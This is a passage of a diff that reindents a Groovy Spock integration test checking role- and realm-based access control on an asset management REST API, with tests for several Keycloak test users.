-        assets.length == 3
-        // Should be ordered by creation time
-        assets[0].id == managerTestSetup.apartment1Id
-        assets[1].id == managerTestSetup.apartment2Id
-        assets[2].id == managerTestSetup.apartment3Id
+    then: "result should match"
+    assets.length == 3
+    // Should be ordered by creation time
+    assets[0].id == managerTestSetup.apartment1Id
+    assets[1].id == managerTestSetup.apartment2Id
+    assets[2].id == managerTestSetup.apartment3Id
 
-        when: "an asset is retrieved by ID in the authenticated realm"
-        def demoThing = assetResource.get(null, managerTestSetup.thingId)
+    when: "an asset is retrieved by ID in the authenticated realm"
+    def demoThing = assetResource.get(null, managerTestSetup.thingId)
 
-        then: "result should match"
-        demoThing.id == managerTestSetup.thingId
+    then: "result should match"
+    demoThing.id == managerTestSetup.thingId
 
-        when: "an asset is retrieved by ID in a foreign realm"
-        def demoSmartBuilding = assetResource.get(null, managerTestSetup.smartBuildingId)
+    when: "an asset is retrieved by ID in a foreign realm"
+    def demoSmartBuilding = assetResource.get(null, managerTestSetup.smartBuildingId)
 
-        then: "result should match"
-        demoSmartBuilding.id == managerTestSetup.smartBuildingId
+    then: "result should match"
+    demoSmartBuilding.id == managerTestSetup.smartBuildingId
 
-        /* ############################################## WRITE ####################################### */
+    /* ############################################## WRITE ####################################### */
 
-        when: "an asset is created in the authenticated realm"
-        def testAsset = new RoomAsset("Test Room")
+    when: "an asset is created in the authenticated realm"
+    def testAsset = new RoomAsset("Test Room")
             .setRealm(keycloakTestSetup.realmMaster.name)
 
-        testAsset = assetResource.create(null, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
+    testAsset = assetResource.create(null, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        then: "the asset should exist"
-        testAsset.name == "Test Room"
-        testAsset.type == RoomAsset.DESCRIPTOR.getName()
-        testAsset.realm == keycloakTestSetup.realmMaster.name
-        testAsset.parentId == null
+    then: "the asset should exist"
+    testAsset.name == "Test Room"
+    testAsset.type == RoomAsset.DESCRIPTOR.getName()
+    testAsset.realm == keycloakTestSetup.realmMaster.name
+    testAsset.parentId == null
 
-        when: "an asset is made public"
-        testAsset.setAccessPublicRead(true)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
+    when: "an asset is made public"
+    testAsset.setAccessPublicRead(true)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        then: "the asset should be updated"
-        testAsset.accessPublicRead
+    then: "the asset should be updated"
+    testAsset.accessPublicRead
 
-        when: "an asset is updated with a new parent in the authenticated realm"
-        testAsset.setParentId(managerTestSetup.groundFloorId)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
+    when: "an asset is updated with a new parent in the authenticated realm"
+    testAsset.setParentId(managerTestSetup.groundFloorId)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        then: "the asset should be updated"
-        testAsset.parentId == managerTestSetup.groundFloorId
+    then: "the asset should be updated"
+    testAsset.parentId == managerTestSetup.groundFloorId
 
-        when: "an asset is made a root asset"
-        testAsset.setParentId(null)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
+    when: "an asset is made a root asset"
+    testAsset.setParentId(null)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
 
-        then: "the asset should be updated"
-        testAsset.parentId == null
+    then: "the asset should be updated"
+    testAsset.parentId == null
 
-        when: "an asset is deleted in the authenticated realm"
-        assetResource.delete(null, [managerTestSetup.thingId])
-        assetResource.get(null, managerTestSetup.thingId)
+    when: "an asset is deleted in the authenticated realm"
+    assetResource.delete(null, [managerTestSetup.thingId])
+    assetResource.get(null, managerTestSetup.thingId)
 
-        then: "the asset should not be found"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "an asset is deleted in a foreign realm"
-        assetResource.delete(null, [managerTestSetup.apartment2LivingroomId])
-        assetResource.get(null, managerTestSetup.apartment2LivingroomId)
-
-        then: "the asset should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "an asset attribute is written in the authenticated realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 123"')
-
-        then: "result should match"
-        BuildingAsset asset
-        conditions.eventually {
-            asset = assetResource.get(null, managerTestSetup.smartOfficeId) as BuildingAsset
-            assert asset.getStreet().isPresent()
-            assert asset.getStreet().get() == "Teststreet 123"
-        }
-
-        when: "an non-existent assets attribute is written in the authenticated realm"
-        assetResource.writeAttributeValue(null, "doesnotexist", BuildingAsset.STREET.name, '"Teststreet 123"')
-
-        then: "the attribute should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "an non-existent attribute is written in the authenticated realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, "doesnotexist", '"Teststreet 123"')
-
-        then: "the attribute should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "an asset attribute is written in a foreign realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartBuildingId, BuildingAsset.STREET.name, '"Teststreet 456"')
-
-        then: "result should match"
-        conditions.eventually {
-            asset = assetResource.get(null, managerTestSetup.smartBuildingId) as BuildingAsset
-            assert asset.getStreet().isPresent()
-            assert asset.getStreet().get() == "Teststreet 456"
-        }
+    then: "the asset should not be found"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
     }
 
-    def "Access assets as testuser1"() {
+    when: "an asset is deleted in a foreign realm"
+    assetResource.delete(null, [managerTestSetup.apartment2LivingroomId])
+    assetResource.get(null, managerTestSetup.apartment2LivingroomId)
 
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def conditions = new PollingConditions(delay: 0.2, timeout: 10)
-
-        and: "an authenticated test user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-
-        /* ############################################## READ ####################################### */
-
-        when: "the assets of the authenticated user are retrieved"
-        def assets = assetResource.getCurrentUserAssets(null)
-
-        then: "no assets should be returned as there are no assets linked to this user"
-        assets.length == 0
-
-        when: "the root assets of the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                        .parents(new ParentPredicate(null))
-        )
-
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.smartOfficeId
-
-        when: "the child assets of an asset in the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(assets[0].id))
-        )
-
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.groundFloorId
-
-        when: "the root assets of the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(null))
-        )
-
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.smartOfficeId
-        assets[0].realm == keycloakTestSetup.realmMaster.name
-
-        when: "the root assets of a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                        .parents(new ParentPredicate(null))
-        )
-
-        then: "a not authorized exception should be thrown"
-        WebApplicationException ex = thrown()
-        assert ex instanceof ForbiddenException
-
-        when: "the child assets of an asset in a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
-        )
-
-        then: "result should be empty"
-        assets.length == 0
-
-        when: "an asset is retrieved by ID in the authenticated realm"
-        def demoThing = assetResource.get(null, managerTestSetup.thingId)
-
-        then: "result should match"
-        demoThing.id == managerTestSetup.thingId
-
-        when: "an asset is retrieved by ID in a foreign realm"
-        assetResource.get(null, managerTestSetup.smartBuildingId)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        /* ############################################## WRITE ####################################### */
-
-        when: "an asset is created in the authenticated realm"
-        def testAsset = new RoomAsset("Test Room").setRealm(MASTER_REALM)
-        testAsset = assetResource.create(null, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
-
-        then: "the asset should exist"
-        testAsset.name == "Test Room"
-        testAsset.type == RoomAsset.DESCRIPTOR.getName()
-        testAsset.realm == keycloakTestSetup.realmMaster.name
-        testAsset.parentId == null
-
-        when: "an asset is updated with a new parent in the authenticated realm"
-        testAsset.setParentId(managerTestSetup.groundFloorId)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, testAsset.getId())
-
-        then: "the asset should be updated"
-        testAsset.parentId == managerTestSetup.groundFloorId
-
-        when: "an asset is moved to a foreign realm and made a root asset"
-        testAsset.setRealm(keycloakTestSetup.realmBuilding.name)
-        testAsset.setParentId(null)
-        assetResource.update(null, testAsset.id, testAsset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is updated with a new parent in a foreign realm"
-        testAsset.setParentId(managerTestSetup.smartBuildingId)
-        assetResource.update(null, testAsset.id, testAsset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is deleted in the authenticated realm"
-        assetResource.delete(null, [managerTestSetup.thingId])
-        assetResource.get(null, managerTestSetup.thingId)
-
-        then: "the asset should not be found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when: "an asset is deleted in a foreign realm"
-        assetResource.delete(null, [managerTestSetup.apartment2LivingroomId])
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset attribute is written in the authenticated realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 123"')
-
-        then: "result should match"
-        conditions.eventually {
-            def asset = assetResource.get(null, managerTestSetup.smartOfficeId) as BuildingAsset
-            assert asset.getStreet().orElse(null) == "Teststreet 123"
-        }
-
-        when: "an asset attribute is written in a foreign realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartBuildingId, BuildingAsset.STREET.name, '"Teststreet 456"')
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "the asset should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
     }
 
-    def "Access assets as testuser2"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset attribute is written in the authenticated realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 123"')
 
-        and: "an authenticated test user"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser2",
-                "testuser2"
-        )
+    then: "result should match"
+    BuildingAsset asset
+    conditions.eventually {
+      asset = assetResource.get(null, managerTestSetup.smartOfficeId) as BuildingAsset
+      assert asset.getStreet().isPresent()
+      assert asset.getStreet().get() == "Teststreet 123"
+    }
 
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
+    when: "an non-existent assets attribute is written in the authenticated realm"
+    assetResource.writeAttributeValue(null, "doesnotexist", BuildingAsset.STREET.name, '"Teststreet 123"')
 
-        /* ############################################## READ ####################################### */
+    then: "the attribute should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
 
-        when: "the assets of the authenticated user are retrieved"
-        def assets = assetResource.getCurrentUserAssets(null)
+    when: "an non-existent attribute is written in the authenticated realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, "doesnotexist", '"Teststreet 123"')
 
-        then: "no assets should be returned as there are no assets linked to this user"
-        assets.length == 0
+    then: "the attribute should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
 
-        when: "the root assets of a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                        .parents(new ParentPredicate(null))
-        )
+    when: "an asset attribute is written in a foreign realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartBuildingId, BuildingAsset.STREET.name, '"Teststreet 456"')
 
-        then: "a not authorized exception should be thrown"
-        thrown(ForbiddenException)
+    then: "result should match"
+    conditions.eventually {
+      asset = assetResource.get(null, managerTestSetup.smartBuildingId) as BuildingAsset
+      assert asset.getStreet().isPresent()
+      assert asset.getStreet().get() == "Teststreet 456"
+    }
+  }
 
-        when: "the root assets of the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(null))
-        )
+  def "Access assets as testuser1"() {
 
-        then: "result should match"
-        assets.length == 1
-        assets[0].id == managerTestSetup.smartBuildingId
-        assets[0].realm == keycloakTestSetup.realmBuilding.name
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def conditions = new PollingConditions(delay: 0.2, timeout: 10)
 
-        when: "the root assets of a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .parents(new ParentPredicate(null))
-        )
+    and: "an authenticated test user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
 
-        then: "a forbidden exception should be thrown"
-        thrown(ForbiddenException)
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
 
-        when: "the child assets of an asset in a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(managerTestSetup.thingId))
-        )
+    /* ############################################## READ ####################################### */
 
-        then: "result should be empty"
-        assets.length == 0
+    when: "the assets of the authenticated user are retrieved"
+    def assets = assetResource.getCurrentUserAssets(null)
 
-        when: "an asset is retrieved by ID in the authenticated realm"
-        def demoSmartBuilding = assetResource.get(null, managerTestSetup.smartBuildingId)
+    then: "no assets should be returned as there are no assets linked to this user"
+    assets.length == 0
 
-        then: "result should match"
-        demoSmartBuilding.id == managerTestSetup.smartBuildingId
+    when: "the root assets of the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .parents(new ParentPredicate(null))
+            )
 
-        when: "an asset is retrieved by ID in a foreign realm"
-        assetResource.get(null, managerTestSetup.thingId)
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.smartOfficeId
 
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    when: "the child assets of an asset in the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(assets[0].id))
+            )
 
-        /* ############################################## WRITE ####################################### */
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.groundFloorId
 
-        when: "an asset is created in a foreign realm"
-        def testAsset = new RoomAsset("Test Room")
+    when: "the root assets of the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(null))
+            )
+
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.smartOfficeId
+    assets[0].realm == keycloakTestSetup.realmMaster.name
+
+    when: "the root assets of a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .parents(new ParentPredicate(null))
+            )
+
+    then: "a not authorized exception should be thrown"
+    WebApplicationException ex = thrown()
+    assert ex instanceof ForbiddenException
+
+    when: "the child assets of an asset in a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
+            )
+
+    then: "result should be empty"
+    assets.length == 0
+
+    when: "an asset is retrieved by ID in the authenticated realm"
+    def demoThing = assetResource.get(null, managerTestSetup.thingId)
+
+    then: "result should match"
+    demoThing.id == managerTestSetup.thingId
+
+    when: "an asset is retrieved by ID in a foreign realm"
+    assetResource.get(null, managerTestSetup.smartBuildingId)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "an asset is created in the authenticated realm"
+    def testAsset = new RoomAsset("Test Room").setRealm(MASTER_REALM)
+    testAsset = assetResource.create(null, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
+
+    then: "the asset should exist"
+    testAsset.name == "Test Room"
+    testAsset.type == RoomAsset.DESCRIPTOR.getName()
+    testAsset.realm == keycloakTestSetup.realmMaster.name
+    testAsset.parentId == null
+
+    when: "an asset is updated with a new parent in the authenticated realm"
+    testAsset.setParentId(managerTestSetup.groundFloorId)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, testAsset.getId())
+
+    then: "the asset should be updated"
+    testAsset.parentId == managerTestSetup.groundFloorId
+
+    when: "an asset is moved to a foreign realm and made a root asset"
+    testAsset.setRealm(keycloakTestSetup.realmBuilding.name)
+    testAsset.setParentId(null)
+    assetResource.update(null, testAsset.id, testAsset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "an asset is updated with a new parent in a foreign realm"
+    testAsset.setParentId(managerTestSetup.smartBuildingId)
+    assetResource.update(null, testAsset.id, testAsset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "an asset is deleted in the authenticated realm"
+    assetResource.delete(null, [managerTestSetup.thingId])
+    assetResource.get(null, managerTestSetup.thingId)
+
+    then: "the asset should not be found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+
+    when: "an asset is deleted in a foreign realm"
+    assetResource.delete(null, [managerTestSetup.apartment2LivingroomId])
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "an asset attribute is written in the authenticated realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 123"')
+
+    then: "result should match"
+    conditions.eventually {
+      def asset = assetResource.get(null, managerTestSetup.smartOfficeId) as BuildingAsset
+      assert asset.getStreet().orElse(null) == "Teststreet 123"
+    }
+
+    when: "an asset attribute is written in a foreign realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartBuildingId, BuildingAsset.STREET.name, '"Teststreet 456"')
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
+
+  def "Access assets as testuser2"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated test user"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser2",
+            "testuser2"
+            )
+
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
+
+    /* ############################################## READ ####################################### */
+
+    when: "the assets of the authenticated user are retrieved"
+    def assets = assetResource.getCurrentUserAssets(null)
+
+    then: "no assets should be returned as there are no assets linked to this user"
+    assets.length == 0
+
+    when: "the root assets of a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .parents(new ParentPredicate(null))
+            )
+
+    then: "a not authorized exception should be thrown"
+    thrown(ForbiddenException)
+
+    when: "the root assets of the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(null))
+            )
+
+    then: "result should match"
+    assets.length == 1
+    assets[0].id == managerTestSetup.smartBuildingId
+    assets[0].realm == keycloakTestSetup.realmBuilding.name
+
+    when: "the root assets of a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .parents(new ParentPredicate(null))
+            )
+
+    then: "a forbidden exception should be thrown"
+    thrown(ForbiddenException)
+
+    when: "the child assets of an asset in a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(managerTestSetup.thingId))
+            )
+
+    then: "result should be empty"
+    assets.length == 0
+
+    when: "an asset is retrieved by ID in the authenticated realm"
+    def demoSmartBuilding = assetResource.get(null, managerTestSetup.smartBuildingId)
+
+    then: "result should match"
+    demoSmartBuilding.id == managerTestSetup.smartBuildingId
+
+    when: "an asset is retrieved by ID in a foreign realm"
+    assetResource.get(null, managerTestSetup.thingId)
+
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "an asset is created in a foreign realm"
+    def testAsset = new RoomAsset("Test Room")
             .setRealm(keycloakTestSetup.realmMaster.name)
-        assetResource.create(null, testAsset)
+    assetResource.create(null, testAsset)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        when: "an asset is made a root asset in the authenticated realm"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1Id)
-        testAsset.setParentId(null)
-        assetResource.update(null, testAsset.id, testAsset)
+    when: "an asset is made a root asset in the authenticated realm"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1Id)
+    testAsset.setParentId(null)
+    assetResource.update(null, testAsset.id, testAsset)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        when: "an asset is created in the authenticated realm"
-        testAsset = new RoomAsset("Test Room")
+    when: "an asset is created in the authenticated realm"
+    testAsset = new RoomAsset("Test Room")
             .setRealm(keycloakTestSetup.realmBuilding.name)
-        assetResource.create(null, testAsset)
+    assetResource.create(null, testAsset)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is deleted in the authenticated realm"
-        assetResource.delete(null, [managerTestSetup.apartment2LivingroomId])
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is deleted in a foreign realm"
-        assetResource.delete(null, [managerTestSetup.thingId])
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset attribute is written in the authenticated realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartBuildingId, BuildingAsset.STREET.name, '"Teststreet 123"')
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset attribute is written in a foreign realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 456"')
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Access assets as restricted testuser3"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def conditions = new PollingConditions(delay: 0.2, timeout: 5)
+    when: "an asset is deleted in the authenticated realm"
+    assetResource.delete(null, [managerTestSetup.apartment2LivingroomId])
 
-        and: "an authenticated test user"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
+    when: "an asset is deleted in a foreign realm"
+    assetResource.delete(null, [managerTestSetup.thingId])
 
-        /* ############################################## READ ####################################### */
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        when: "the assets of the authenticated user are retrieved"
-        def assets = assetResource.getCurrentUserAssets(null)
+    when: "an asset attribute is written in the authenticated realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartBuildingId, BuildingAsset.STREET.name, '"Teststreet 123"')
 
-        then: "result should match"
-        assets.length == 6
-        Asset apartment1 = assets[0]
-        apartment1.id == managerTestSetup.apartment1Id
-        apartment1.name == "Apartment 1"
-        apartment1.createdOn.toEpochMilli() < System.currentTimeMillis()
-        apartment1.realm == keycloakTestSetup.realmBuilding.name
-        apartment1.type == BuildingAsset.DESCRIPTOR.getName()
-        apartment1.parentId == managerTestSetup.smartBuildingId
-        apartment1.path[0] == managerTestSetup.smartBuildingId
-        apartment1.path[1] == managerTestSetup.apartment1Id
-        apartment1.attributes.size() == 8
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        Asset apartment1Livingroom = assets[1]
-        apartment1Livingroom.id == managerTestSetup.apartment1LivingroomId
-        apartment1Livingroom.name == "Living Room 1"
+    when: "an asset attribute is written in a foreign realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 456"')
 
-        Asset apartment1Kitchen = assets[2]
-        apartment1Kitchen.id == managerTestSetup.apartment1KitchenId
-        apartment1Kitchen.name == "Kitchen 1"
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
 
-        Asset apartment1Hallway = assets[3]
-        apartment1Hallway.id == managerTestSetup.apartment1HallwayId
-        apartment1Hallway.name == "Hallway 1"
+  def "Access assets as restricted testuser3"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def conditions = new PollingConditions(delay: 0.2, timeout: 5)
 
-        Asset apartment1Bedroom1 = assets[4]
-        apartment1Bedroom1.id == managerTestSetup.apartment1Bedroom1Id
-        apartment1Bedroom1.name == "Bedroom 1"
+    and: "an authenticated test user"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
 
-        Asset apartment1Bathroom = assets[5]
-        apartment1Bathroom.id == managerTestSetup.apartment1BathroomId
-        apartment1Bathroom.name == "Bathroom 1"
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
 
-        when: "the root assets of a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                        .parents(new ParentPredicate(null))
-        )
+    /* ############################################## READ ####################################### */
 
